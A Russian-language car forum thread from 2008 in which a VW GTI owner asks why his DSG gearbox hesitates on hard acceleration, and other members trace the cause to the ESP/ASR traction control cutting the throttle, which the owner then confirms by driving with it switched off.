+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 20

Тема: DSG затыкается

Собственно вопрос. После спокойной езды в режиме D при резком нажатие на педаль газа происходит секундное тупление, т.е машина как бы поехала, потом затыакается, думает потом едет. Лана, я думал в режиме D отупляется ибо шипко умная.
    Однако сегодня та же фигня в режиме S. Переключился, проехал метров 20, резко прижал - заткнулась.
    У кого было пообное? Как лечить? Из за чего она себя так ведет? :blink:

Это из-за ЕСР или как там его. На летней резине все будет хор., или кнопочку надо нажать, что бы буксовать безприпятственно ;)

Тагда не понимам, обьясните люди добрые. Почему эта сволочь (ЕСП) позволяла мне довольно часто и сильно буксовать на снегу, а тут почти сухой асфальт и ей вдруг вздумалось вмешиваться? :huh:

<div class='quotetop'>Цитата(cbrrr &#064; Mar 11 2008, 22&#58;12) <{POST_SNAPBACK}></div><div class='quotemain'>Это из-за ЕСР или как там его. На летней резине все будет хор., или кнопочку надо нажать, что бы буксовать безприпятственно ;)[/b][/quote]
    ESP включается и ее включение отображается значком. он моргает. надо посмотреть моргает ли он. даже при включенной ЕСП она позволяет немного буксовать. проблема недостаточно описана, чтобы что то посоветовать.

Ок, изложу.
    Резина не шипы. Асфальт не мокрый, но 2 градуса тепла подразумевают не очень хорошее сцепление. ЕСП сейчас, на мой взгляд, моргает до 60 постоянно :unsure: . Правда, когда в S притапливаешь, особенно на индикацию не смотришь.
    Как происходи затыкание. При кик дауне происходит резкий набор скорости(около секунды может пол секунды) , потом коробка вдруг тормозит (очень похоже на срабатывание ограничителя оборотов на механнике) обороты падают, легкий толчок как подключение передачи , потом втыкает нормальную передачу и прет как обычно.
    Коробка раздумывает... раздумья позволяют Пежо 1,6 уехать на корпус при старте, жена меня тут поглумила :blink:

GTI-Racing IvanGTIV is on a distinguished road Аватар для IvanGTIV
    Машина
    GTI V DSG, REVO, H&R, KONI sport, H2sport, Goodridge, RBF600, DS2500, ATE PowerDisc, OZ racing
    <div class='quotetop'>Цитата(Жека &#064; Mar 11 2008, 21&#58;31) <{POST_SNAPBACK}></div><div class='quotemain'>Ок, изложу.
    Резина не шипы. Асфальт не мокрый, но 2 градуса тепла подразумевают не очень хорошее сцепление. ЕСП сейчас, на мой взгляд, моргает до 60 постоянно :unsure: . Правда, когда в S притапливаешь, особенно на индикацию не смотришь.
    Как происходи затыкание. При кик дауне происходит резкий набор скорости(около секунды может пол секунды) , потом коробка вдруг тормозит (очень похоже на срабатывание ограничителя оборотов на механнике) обороты падают, легкий толчок как подключение передачи , потом втыкает нормальную передачу и прет как обычно.
    Коробка раздумывает... раздумья позволяют Пежо 1,6 уехать на корпус при старте, жена меня тут поглумила :blink:[/b][/quote]

Похоже именно на работу ЕСП (а точнее АСР - антипробуксовочной системы) - прикрытие дросселя. Выражается во внезапной кратковременной потере тяги или "затыкании" при разгоне. Проверить это оно или что-то не так с ДСГ или мотором очень просто - на одном и том же месте в одном и том же режиме проехать с ЕСП вкл. и затем выкл. - если при ЕСП выкл. "затыка" не будет, значит все ок и просто АСР прикрывает дроссель по причине пробуксовки (когда ЕСП вкл.).

Кстати практика показывает, что при активной езде ЕСП (АСР) лучше выключать - пару раз попадал в ситуации когда машина на разгоне попадала в лужицу и АСР закрывало дроссель как раз когда мне по ситуации нужно было ускорится - очень неприятно. Кстати может кто не знает - когда нажимаешь кнопку ЕСП ОФФ, на самом деле полностью выключается только антипробуксовочная система АСР, а ЕСП, которая отвечает за динамическую стабилизацию (противостоит сносу/заносу) просто переходит на несколько более либеральный режим (как-бы повышается порог срабатывания) т.е. все равно она ставит машину обратно на траекторию в случае чего.

Спасибо. Вы были правы, все ЕСП, она чертовка ;) , сегодня покатал с отключенной, все изумительно (блин как же она все таки прет :blink: ) , коробка не тупит и не затыкается :rolleyes:

<div class='quotetop'>Цитата(Жека &#064; Mar 12 2008, 18&#58;57) <{POST_SNAPBACK}></div><div class='quotemain'>Спасибо. Вы были правы, все ЕСП, она чертовка ;) , сегодня покатал с отключенной, все изумительно (блин как же она все таки прет :blink: ) , коробка не тупит и не затыкается :rolleyes:[/b][/quote]

+1

Мимо проходил dionisiy2007 is on a distinguished road Аватар для dionisiy2007
    Насколько я знаю,затыкается...как бы сказать...электроника подстраивается под нормы токсичности.
    Поправьте меня, у всех владельцев DSG затыкается при резком нажатии на газ...
    А есп,я считаю изюмительно работает, правда пока зимой еще не ездил, самому интересно как будет работать

ЕСП значок на приборке далеко не всегда успевает загорется [img]style_emoticons/<#EMO_DIR#>/smile.gif[/img]

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Ваши права